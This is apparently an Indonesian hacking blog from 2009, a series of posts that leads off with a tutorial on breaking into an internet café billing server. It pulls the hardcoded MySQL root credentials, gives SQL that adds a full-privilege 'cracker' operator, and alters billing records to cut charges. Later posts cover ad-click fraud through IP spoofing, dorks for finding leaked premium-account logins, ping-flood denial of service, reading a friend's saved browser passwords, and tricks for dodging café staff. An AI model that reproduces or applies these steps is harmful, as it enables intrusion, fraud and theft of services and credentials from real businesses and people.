TCP 127.0.0.1:49219 Owner-PC:49218 ESTABLISHED
TCP 127.0.0.1:49220 Owner-PC:49221 ESTABLISHED
TCP 127.0.0.1:49221 Owner-PC:49220 ESTABLISHED
TCP 192.168.10.16:49168 cs31:5050 ESTABLISHED
TCP 192.168.10.16:49173 sip36:https ESTABLISHED
TCP 192.168.10.16:49559 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49560 202.96.64.144:55944 ESTABLISHED
TCP 192.168.10.16:49561 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49562 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49565 192.168.10.1:3306 ESTABLISHED
==============================================
keliatan kan kalo port 3306 lagi konek ke IP 192.168.10.1. Nah IP itu tu IP na Billing Server.
Sekarang tinggal konek ke DB mySQL pake SQLyog. yg belom punya SQLyog bs didapet dengan
Googling pake keyword Download SQLyog.
Sekarang mulai untuk konek ke DB mySQL nya server.
Yang diperluin untuk bisa konek ke DB adalah user name, password dan IP address nya server,
yang msh jd pertanyaan adalah "password & username" nya apa ???
==============================
info koneksi ke mySQL server Indo Billing
username : root
password : root1
==============================
Pertanyaan Newbie :
[x]nah lo ... tau dari mana tuw ?? emang developer nya temen mu ??? ato di kasih tau di webshit
nya ???
yaahh... sedikit jail lah, buka aja file exe-nya pake Winhex, pasti username+password kesimpan di
exe-nya sebagai ASCII, jd bisa langsung kebaca tanpa perlu convert2xan. but, jgn langsung maen
buka aj, exe-nya diprotect dengan compressor lo, tp jg ga perlu kuatir karena udah ada decompressor
nya. yang jelas compressor nya make UPX, de-compressor nya nyari ndiri aja ya ...
hmmm.... udh deh, kunci udh ditangan, tinggal eksekusi aj.
[x[Cara eksekusi gimane?
ya gampang aja, tinggal make SQLyog nya aja, masukin username, password ama host nya
dengan data-data yang udah didapet sebelum nya. nama database dibiarkan kosong aja.
kalo udah terkoneksi dengan server, maka semua isi database nya bakal keliatan, nah kita bisa
ngubah semua hal yang berhubungan dengan indobilling pada table "warnet".
misalnya kita pengen nambahin operator di billing server dengan username "cracker" dan
password "cracker" yang full priviledges. bisa dilakukan dengan make GUI nya SQLyog atawa
dengan menjalankan SQL command berikut ini :
============================================= [don't copy paste this line]
insert into operator
(op_id,op_user,op_password,op_name,item,member,setup,report,close,send,billing,
op_editbilling,op_delbilling,op_editmember,op_delmember,op_edititem,op_delitem,
op_cancel)
values
(22,'cracker',password('cracker'),'intruder','true','true','true','true','true','true','true','Y','Y','Y','Y','Y','Y','
Y')
============================================= [don't copy paste this line]
nahhh .... gampang kan.
kalo pengen ngubah harga billing juga bisa. SQL command nya kira-kira kaya gini ni
dimana,
-> format st_start = 'yyyy-mm-dd hh:mm:ss'
-> format st_name = 'nama username'
-> st_id = 'nomor KBU'
yang perlu diinget adalah nilai "st_start" harus waktu saat pengupdatean DB dilakuin. bisa juga
dengan make fungsi SQL yaitu curdate() dan curdate().
============================================= [don't copy paste this line]
update station set st_start='2007-07-01 20:30:30',st_name='invisible_theater',
st_duration='00:01:00' where st_id='1'
============================================= [don't copy paste this line]
dengan menggunakan fungsi curdate() dan curtime() kira-kira kaya gini ni.
============================================= [don't copy paste this line]
update station set st_start=concat(curdate(),' ',curtime()),st_name='invisible_theater',
st_duration='00:01:00' where st_id='1'
============================================= [don't copy paste this line]
kalo emang pengen ngganti2x data laen nya silakan cari ndiri aja, ini kan sekedar contoh
implementasi aja.

29 Juli 2009

Trik ngerubah IP

sebenar nya tutor ini rahasia banget,krn apa....

dewasa ini bisnis on line makin marak seiring berkembangnya zaman. banyak cara dilakukan oleh "peternak internet" (emang sapi,apa...???) dalam mengklik iklan sendiri,walaupun google adsense telah mengultimatum para "peternak internet" dalam hal ini,tp mereka tak pernah kehilangan akal,mulai dari software HIDE IP PLATINUM atau apapun itu yg intinya dapat merubah IP,sehingga dapat meng klik iklan sendiri,kata pepatah: " maling lebih pintar dari polisi " iya enggak...??? (ya iyalah,masak iya dong) dibawah ini trik dalam merubah IP agar kita biar tdk di banned ma mbah marGO OGLE.

perhatiin baik2 ya,kaya pak guru aja,he he he....

gini rumusnya:

1. browsing menggunakan internet explorer
* buka IE 7,lalu klik "tools" # "internet options" # "connection",lalu klik "LAN setting'
* centang tulisan "use a proxy server for your LAN...".
* tinggal masukkkin IP palsu dikolom "addres:..."
* lalu tekan "OK",selesai deh......!!!


2. browsing menggunakan firefox
* buka firefox, klik "tools" # "options".
* klik tulisan "network" lalu "setting".
* Lalu klik "Manual Proxy Configuration", masukan IP palsu yang diinginkan di kolom " http proxy...".
* lalu klik OK,selesai.......!!!


(nb: 1.buat yg gk pny hide ip platinum ato sejenisnya
2.saat kita browsing akan terasa lemood
3.sebelum merubah IP,bersihkan dulu cookies dan sebagsanya)

silahkan mencoba & s'moga berhasil...

Hack billing warnet v.2

Ketika Saya Sedang Asyik Main Internet Ternyata Tanpa terasa Uang Di kantong saya cekak alias gak cukup untuk membayar tagihan yang tertera di billing terpaksa saya hack billing nya dan jreeeennnng saya berhasil membobol nya dan membayar sesuai kemampuan ingin tau proses nya silakan klik

DOWNLOAD

ingat...
Resiko dan Dosa anda yang tanggung sendiri...

App hack billing warnet

Pahami dan pelajari trus jalankan (ingat aplikasi ini hanya untuk warnet yang serakah) download panduan dan software yang lengkap disini :
DOWNLOAD

Mencari Akun premium Rapidshare

KetiK aJa di mBah GoogLe.Com :

expiration-date:*2009 +login: rapidshare.com


dari GOOGLE oleh GOOGLE untuk GOOGLE


Met HunTing AcooUnt GratiSaN......!!!!!!!!!

Rapidshare Time Delay dan Download Limit Trick

Download file di Rapidshare rupanya dilimit. Padahal baru mulai download. Harus nunggu 5 menit, kadang suruh nunggu 15 menit. Selain itu tiap mau mulai download diharuskan menunggu detikan counter berjalan mundur sampai sekitar 1 menit. Bikin bete saja. Ni ada beberapa trik yang berhasil saya tulis disini. Semoga yang lain cocok juga pake trik ini

1. Untuk menghilangkan counter hitungan mundur bisa dengan menonaktifkan javascriptnya. Caranya:
Buka Mozilla atau IE, kemudian Buat new Bookmark. Setelah itu isi link dengan code berikut: javascript:alert(c=0)
atau code ini juga bisa
javascript:var c=0;
Kemudian simpan Bookmark tersebut
Setiap kali akan mendownload file yang berada di rapidshare akan menunggu hitungan counter, silakan klik bookmark diatas agar counter itu hilang, dan proses download bisa langsung berjalan.
Lumayan trik ini menghemat waktu menunggu sekitar 1 menit
Jika trik diatas gagal coba trik berikut ini di copy paste di address bar browserm. Jangan lupa teks code berikut ditulis tanpa pergantian baris. Jadi 1 baris utuh tanpa spasi dan enter
javascript:var%20counta=0;var%20countb=0;var%20countc=0;var%20countd=0;
var%20counte=0;var%20countf=0;var%20countg=0;var%20counth=0;var%20counti=0;
var%20countj=0;var%20countk=0;var%20countl=0;var%20countm=0;var%20countn=0;
var%20counto=0;var%20countp=0;var%20countq=0;var%20countr=0;var%20counts=0;
var%20countt=0;var%20countu=0;var%20countv=0;var%20countw=0;var%20countx=0;
var%20county=0;var%20countz=0;

2. Jika Rapidshare menampilkan download Limit sehingga anda harus menunda sampai 15 menit atau lebih bisa dicoba tip berikut ini
buka Start >> Run kemudian ketik CMD
Setelah itu ketik pada prompt seperti berikut:
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit

Kemudian coba mendownload file di rapidshare lagi. Jika gagal biasanya direfresh sampe 3 kali maka limit akan hilang dan file bisa langsung didownload.
Jika repot untuk cara yang mudah dan cepat silakan download kode sederhana yang saya buat ini untuk menjalankan perintah bat.

27 Juli 2009

Hacking menggunakan Dos

Microsoft DOS datang dengan beberapa hacking tool tersembunyi yang akan saya diskusikan disini. Tool ini dapat ditemukan pada direktori c:\windows jika anda menggunakan win98 dan jika anda menggunakan winxp maka tool ini berada pada C:\winxp\system32. WinXP, Win2000 dan WinNT dirilis dengan beberapa tool internet tambahan. Jadi jika anda masih menggunakan win98 maka saya menyarankan agar menggantinya dengan WinXP. Yang tentunya memiliki fitur securiti tambahan dan perintah hacking internet yang bagus. Dalammanual ini saya akan membahas mengenai beberapa perintah yang ditemukan pada Win98 dan winXP
Jadi bagi pengguna window, berikut ini perintah-perintah hacking pada DOS.
1. ping
2. tracert
3. telnet
4. ftp
5. netstat
OK, inilah keterangannya.
1. ping
Utiliy ini digunakan untuk mencari keberadaan remote host. Yan gmengirmkan sebuah signal SYN ke remote host dan jika remote hostmembalas maka berarti memang ada suatu remote machine.
Cobalah anda ketik perintah ini:
C:\windows>ping/?
*************
Newbie tip: mengetik '/?' setelah perintah dos menampilkan helpnya. Jadi bagaimana anda belajar aneka perintah dos. Bukankah WinXP, WinNT dan Win2000 juga memiliki perintah âE~helpâE™ untuk menampilkan seluruh perintah dos.
*************
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list
Options:
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.
Jadi saya dapat melakukan ping ke ip address apapun atau domain name untuk memeriksa keberadaannya di internet. Sebagai contoh saya mengetik âEśping localhostâEť maka saya mendapatkan.
Pinging chintan [127.0.0.1] with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
************
Newbie tip: 'localhost' adalah ip 127.0.0.1 dan merupakan ip address kita sendiri. Juga dikenal sebagai loopback ip. Tapi saat anda terhubung ke internet anda akan diberi ip baru oleh isp anda sebagai identifikasi diri anda. Anda dapat mencari tahu ip andadengan mengetikâEťwinipcfgâEť pada menu Start-Run bagi pengguna Win98, sedangkan yang lainnya hanya mengetikkan âEśipconfigâEť pada command prompt.
***********
Hal ini menunjukkan kepada saya bahwa 32 byte data dikirim ke 127.0.0.1 dan dibalas kembali kurang dari 10ms. TTL adalah Time ToLive dan nilai range dari 0 hingga 255 (default 128). Sekarang biar kita lihat apa yang terjadi jika saya mengetik âEśpingwww.yahoo.comâEť
Pingingwww.yahoo.akadns.net[66.218.71.87] with 32 bytes of data:
Reply from 66.218.71.87: bytes=32 time=3448ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2276ms TTL=54
Reply from 66.218.71.87: bytes=32 time=1799ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2850ms TTL=54
Ping statistics for 66.218.71.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1799ms, Maximum = 3448ms, Average = 2593ms
Tapi bagaimana ping tersebut digunakan oleh para hacker? Baiklah, ada dua opsi âE~|âE™ dan âE~-tâE™ yang mematikan. -| digunakan untuk spesifikasi ukuran buffer yang dikirimkan (defaultnya 32 byte) bagaimana jika saya mengetik âEśping -| 65600 target.comâEť maka hal ini akan membawa maut 65600 paket data ke target.com yang lebih tinggi dari kapasitas TCP/IP 65535. Tindakan ini menyebabkan target.com menjadi hang dan harus di restart.
Dan jika saya mengetik âEśping âE"t target.comâEť hal ini akan meneruskan pengiriman 32 byte data ke target.com hingga menghabiskan resource dan menyebabkan hang. Dua jenis serangan diatas dikenal sebagai ping attack bagi penyerang Dos.
***********
Newbie tip: 'Dos' yang terakhir disebutkan adalah Denial of service yang dilancarkan oleh hacker untuk menghentikan service padaremote machine.
***********
Catatan: Jenis serangan ini dimasa lalu sering digunakan, namun saat ini pada sistem yang telah diperbarui hal tersebut tidak akan bekerja lagi.
2. Tracert
Perintah Tracert melakukan penjejakan ke remote machine. Sebelum request kita menjangkau remote machine melalui router yang berbeda diantaranya. Tool tracert (dikenal sebagai âE~tracerouteâE™ pada unix) pada awalnya dirancang untuk mencari router mana yang mengalami masalah. Perintah tersebut menunjukkan ip address router yang dilalui request kita sebelum menjangkau remote maching. Sebagai contoh, jika saya mengetik âEśtracertwww.yahoo.comâEť pada dos prompt maka akan terdapat:
Tracing route towww.yahoo.akadns.net[66.218.71.87]
over a maximum of 30 hops:
1 * 2296 ms 2025 ms dialpool-210-214-55-11.maa.sify.net [210.214.55.11]
2 2446 ms 2025 ms 2301 ms dialpool-210-214-55-2.maa.sify.net [210.214.55.2]
3 1899 ms 2066 ms 2450 ms lan-202-144-32-177.maa.sify.net [202.144.32.177]

24 Juli 2009

Cara liad password yg remember di Firefox

Bagi yang seneng utak atik komputer temen yang demen menggunakan firefox.
Apalagi yang agak ceroboh(mungkin lebih tepatnya malas mengingat password) dan selalu memanfaatkan remember passwordnya sebuah browser. Ini dapat jadi peluang nich bagi yang penasaran password pada site tertentu. (Seperti password email mungkin?? atau mungkin password loginnya blogger) :-)

To the point az.
Buka firefox nya lalu pilih tools -> option -> security -> show password
nah jika ada yang menggunakan fasilitas remember password pasti site yang passwordnya diremember akan di list di sana lengkap user dan passwordnya. Selanjutnya Terserah yang mencoba (asal jangan ampe merugikan orang lain yo)

Batch Programming



Untuk berbagai kepentingan, kita sering memerukan aplikasi praktis dan simple untuk menggantikan aktivitas mudah, sangat sering dilakukan namun cukup memakan waktu.
Sebagai contoh membersihkan file2 yg tidak berguna dari project directory, meng-compile source code, konversi data/file, hide/unhide folder dan seluruh strukturnya, mempublish web via ftp dan masih banyak lagi aktivitas rutin dan mudah yang menyita banyak energi.

Untuk kepentingan ini saya sering menggunakan batch file (*.bat -- yang berisi kumpulan perintah dos, atau command line terhadap program) untuk melakukannya. kalo perlu saya membuat sebuah aplikasi yang mendukung command line (sudah tentu dg delphi), untuk kemudian saya panggil melalui batch file.

Sesungguhnya selain batch file, masih ada Windows Scripting Host (WSH) dan Powershell (untuk dot net). dua yg terkhir ini lebih kompleks dan mendukung GUI (Graphical User Interface) sederhana.
Aktivitas Mengetik daftar berintah baris demi baris pada sebuah file yang nantinya file tersebut melakukan aktivitas pengganti pekerjaan tangan yg menjemukan kita sebut saja sebagai Batch Programming (saya lupa dapat istilah ini dari mana).

gambar diatas adalah gambaran bagaimana bekerjanya Batch File dan WSH


moga suatu waktu kita sempat membahas lebih detail tentang Batch Programming. untuk sementara saya berikan beberapa link yang mungkin berguna untuk dijadikan referinsi, antara lain :
An A-Z Index of the Windows XP command line
DOS Command Index
Batch Scripts for Windows
Windows PowerShell Blog
PowerShell.com ==> Script Library

semoga bermanfaat

Hack Warnet Manual

Hai kawan aq pgn ksh trik unik tp langka jg asik, coz semenjak software zhider gk berfungsi di billing versi 6 keatas,,di bwh ini adlh trik hack warnet manual
ni hanya sebagai pengetahuan apapun yang terjadi silahkan tanggung sendiri :D
Cara sederhana bobol billing menggunakan keyboard saat restart :

1. tangan kasih handbody

2. ambil ancang ancang

3. tangan kanan pencet F5, F6, F7, F8, (Jari kelingking memencet F11, F12)

4. tangan kiri memencet shift, ctrl, space, enter


tapi ingat saat di restar dan saaat window ada tulisan welcome
cara tersebut baru di lancarkan pencet terus sampai billing
hilang & nikmati hasilnya

Nb : Supaya tidak dicurigai
Langkah-langkahnya :


01. Masuk warnet dan pasang muka bego biar ga dicurigai operator

02. Pastikan tempat ramai dan selain box/bilik yang kita tempati masih ada box lain yang kosong.
Biar ga dicurigai juga sih.

03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu
kosong apa nggak.

04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.

05. Saat masuk login screen, login aja seperti biasa.
dan jalankan seperti yang tertera diatas ok

saatnya olah raga jari. wkwkwwwwwkkkkkkkkk

23 Juli 2009

Tips search google

MeskipunGoogle
menyediakan banyak fitur pencarian, saya yakin tidak banyak dari kita
yang menggunakannya pada saat melakukan pencarian informasi. Akhirnya
kita kena badai tsunami informasi dari Google yang akhirnya membuat
kita bingung sendiri. Kita bahas yuk, teknik pencarian yang efektif itu
sebaiknya seperti apa sih.
Secara umum, jenis pencarian di Google ada dua:Basic SearchdanAdvanced Search.Basic Searchadalah fitur pencarian yang sudah biasa kita gunakan yaitu ketika mengakses langsung google.com.
SedangkanAdvanced Searchmenyediakan berbagai pilihan fitur pencarian baik untuk operator dasar, file format yang ingin kita cari, bahasa, region, dsb.
Sebenarnya masih sangat banyak fitur pencarian yang bisa kita gunakan, tapi tidak terdapat di menu pilihanAdvanced Search. Dengan kata lain kita harus memasukannyaquerydi form pencarian diBasic Searchlangsung. Nah permainanquerydan operator pencarian ini yang sebenarnya akan kita bahas di artikel ini.

FITUR PENCARIAN DASAR

1.AND: Mencari informasi yang mengandung kedua kata yang dicari. Bisa menggunakan salah satu dari tiga alternatif berikut:
ukiran jepara
ukiran AND jepara
ukiran+jepara

2.OR: Mencari informasi yang mengandung salah satu dari kedua kata. Bisa menggunakan salah satu dari dua alternatif berikut:
tahu OR tempe
tahu | tempe

3.FRASE: Mencari informasi yang mengandung frase yang dicari dengan menggunakan tanda âEśâEť. Contoh:
âEśperangkat lunakâEť

4.NOT: Hasil pencarian mengandung
kata yang di depan, tapi tidak yang dibelakang minus (-). Contoh di
bawah akan mencari informasi yang mengandung kataikantapi bukanbandeng.
ikan -bandeng

5.SINONIM (~): Mencari kata beserta sinonim-sinonimnya. Contoh di bawah akan membawa hasil pencarian: kendaraan (car) dan sinonim-sinonimnya.
~car

6.ASTERIK (*): Karakter pengganti kata. Dari contoh di bawah, hasil yang didapat bisa:ayam bakar pedas, ayam goreng pedas, ayam masak pedas,dsb
ayam * pedas

7.TANDA TITIK (.): Karakter pengganti huruf, angka dan karakter tunggal. Dari contoh di bawah, hasil yang didapat bisa:kopi, koki, kodi,dsb
ko.i

8.CASE INSENSITIVE: Pencarian di Google menganggap kapital dan bukan kapital sebagai sesuatu yang sama. Jadi,adie kurniawan, Adie Kurniawan, atau AdiE KuRNiaWan akan membawa hasil pencarian yang sama

9.PENGABAIAN KATA: Google mengabaikan keyword berupa karakter tunggal dan kata-kata berikut:a,
about, an, and, are, as, at, b, by, from, how, i , in, is, it, of, on,
or, that, the, this, to, we, what, when, where, which, with.
Apabila kita masih tetap menginginkan pencarian kata tersebut, bisa
dengan menggunakan karakter + di depan kata yang dicari (contoh:Star Wars Episode +I),

FITUR PENCARIAN LANJUT


1.DEFINE: Mencari definisi dari
sebuah terminologi. Dari contoh di bawah, hasil yang didapat adalah
berbagai definisi tentang e-learning dari berbagai sumber
define:e-learning

2.CACHE: Menampilkan situs web yang
telah diindeks oleh Google meskipun sudah tidak aktif lagi. Contoh di
bawah akan menghasilkan pencarian kataphppada situsilmukomputer.comyang ada di indeks Google.
cache:ilmukomputer.com php

3.LINK: Menampilkan daftar link yang
mengarah ke sebuah situs. Contoh di bawah akan menampilkan daftar link
yang mengarah ke situs ilmukomputer.com
link:ilmukomputer.com

4.RELATED: Menampilkan daftar situs yang serupa, mirip atau memiliki hubungan dengan suatu situs
related:romisatriawahono.net

5.INFO: Menampilkan informasi yang Google ketahui tentang sebuah situs
info:romisatriawahono.net

6.SITE: Menampilkan pencarian khusus di suatu situs yang ditunjuk
java site:ilmukomputer.com

7.FILETYPE: Menampilkan hasil pencarian berupa suatu jenis (ekstensi) file tertentu. Jenis file yang bisa dicari adalah:doc, xls, rtf, swf, ps, lwp, wri, ppt, pdf, mdb, txt, dsb. Contoh di bawah akan menampilkan hasil pencarian berupafile PDFyang mengandung keywordsoftware engineering
software engineering filetype:pdf

8.ALLINTITLE: Menampilkan seluruh kata yang dicari dalam TITLE halaman. Contoh di bawah akan menghasilkan halaman yang memiliki titlejava programming. allintitle ini tidak dapat digabungkan dengan operator (sintaks) lain. Gunakan intitle untuk keperluan itu.
allintitle:java programming

9.INTITLE: Menampilkan satu kata yang dicari dalam TITLE halaman. Contoh di bawah akan menghasilkan halaman yang memiliki titlejavadan isi halaman yang mengandung kataenterprise
intitle:java enterprise

10.ALLINURL: Menampilkan seluruh kata yang dicari di dalam URL. Contoh di bawah akan menghasilkan daftar URL yang mengandung katajavadanprogramming. allinurl ini tidak dapat digabungkan dengan operator (sintaks) lain. Gunakan inurl untuk keperluan itu.
allinurl:java programming

11.INURL: Menampilkan satu kata yang dicari di dalam URL. Contoh di bawah akan menghasilkan daftar URL yang mengandung kata javadan isi halaman yang mengandung kata enterprise
inurl:java enterprise
Pencarian yang kita lakukan akan semakin efektif
apabila kita mencoba menggabungkan bberapa operator baik yang ada di
fitur pencarian dasar maupun lanjut. Misalnya, kita ingin mencari
file-filePDFyang ada di situshttp://www.pdii.lipi.go.id/. Maka kita gabungkan dua operator menjadi:
filetype:pdf site:www.pdii.lipi.go.id
Dewasa ini permainan query pencarian Google banyak digunakan para hacker dan cracker untuk mencari berbagai informasi, file, dan konfigurasi yang memiliki lubang keamanan. Aktifitas ini terkenal dengan sebutan Google Hacking..

Anatomi Hacking

Untuk dapat mendekati orang yang kita sukai, ada beberapa hal yang harus diperhatikan, yaitu mendapatkan informasi tentang dia:
1. hobinya apa?
2. apa makanan kesukaanya?
3. siapa keluarganya?
4. dll

sama seperti server, jika kita ingin memasuki suatu server, kita harus tahu informasi tentang informasi tentang server tersebut, seperti:
1. apa system operasi yang dipakai?
2. IP addressnya berapa?
3. port berapa saja yang terbuka?
4. aplikasi apa saja yang dipakai?

Itulah yang disebut Footprinting, sebenarnya Footpriting didefinisikan sebagai pencari informasi tentang target serangan, dan Foorprinting terbagi 2:
1. Inner Footprinting
2. Outer Footprinting

28 Juni 2009

About JavaScript

Pengenalan

JavaScript adalah suatu bahasa script yang menyerupai cara penulisan pada Java. Kode JavaScript dituliskan diantara tag HTML yang akan diinterpretasikan oleh browser klien. Java script akan membuat halaman Web anda menjadi lebih interaktif. Menggunakan JavaScript, memungkinkan kustomisasi terhadap dokumen HTML pada saat diakses dengan menulis melalui penanganan event terhadap elemen-elemen dalam halaman tersebut, memeriksa data form pada sisi klien dan melakukan perhitungan pada sisi klien.

Agar dapat bekerja dengan lancar dengan contoh JavaScript berikut ini, tentu saja anda membutuhkan suatu browser yang mendukung JavaScript which you already have.
Tentang JavaScript

JavaScript adalah bahasa script yang dinamis. Hal ini berarti bahwa tipe data pada Javascript tidak baku tetapi dapat berubah dari suatu tipe ke tipe yang lain sesuai dengan kebutuhan. Sebagai contoh, anda dapat menyatakan myData = 10; pada suatu baris initialisasi, dan baris berikutnya, menyatakan myData = "Hello World!" yang membuat tipe myData menjadi suatu string. Java Script akan secara otomatis mengubah tipe data berdasarkan ekspresi yang ditentukan. Jadi jika anda menyatakan myData = "10" - 2;, maka anda akan bertanya mengapa Javascript tidak mengkonversi 2 menjadi "2" dan menghasilkan "102", jawabanya adalah karena operator - tidak ditujukan untuk pemakaian pada string sehingga "10" - 2 tidak memiliki arti sama sekali. Berikut ini akan membawa kita kepada suatu situasi yang lebih menarik. Operator + dinyatakan untuk pemakaian pada numerik dan string. Jadi akankah 10 + "20" mengembalikan nilai 30 (10+20) atau "1020" ("10" + "20"). Hal ini tentu saja akan membingungkan anda dengan pemakaian operator +, jawabannya adalah Javascript akan selalu mengkonversi segala sesuatu ke string sebelum melakukan evaluasi, sehingga 10 + "20" adalah sama dengan "10" + "20" dan hasilnya adalah "1020".

Perhatian: JavaScript membedakan huruf besar dan kecil, sehingga penulisan indoprog adalah berbeda dengan Indoprog (Ngomong-ngomong apakah kepanjangan dari indoprog?)

Berkaitan dengan keamanan yang terkandung dalam JavaScript, adalah sangat tidak benar bahwa kode JavaScript dapat merusak sistem anda. Sehingga anda dapat mengunakannya tanpa perasaan was-was.

27 Juni 2009

Wellcome to my Blog

SELAMAT DATANG DI BLOG SAYA

Salam hangat kupersembahkan kepada kepada hacker newbie ato orang yang ingin belajar tentang hack..

seperti yang kita tahu, hacker dan komunitasnya bisa juga disebut penguasa jaringan, hacker berguna untuk mengamankan sistem jaringan sedangkan cracker sebaliknya yaitu merusak sistem jaringan
namun bagi sebagian orang hacker di kenal sebagai aksi cybercrime.
karna banyak orang menyangka seperti pembobolan bank, pencurian kartu kredit, dll di karnakan ulah seorang hacker
saya disini akan membahas sedikit bagaimana cara para hacker bekerja, mulai dari memasuki sistem orang (target/server), dll
selanjutnya anda pelajari sendiri!!!

PERINGATAN!!!

SAYA TIDAK BERTANGGUNG JAWAB ATAS TINDAKAN KRIMINAL PENGGUNA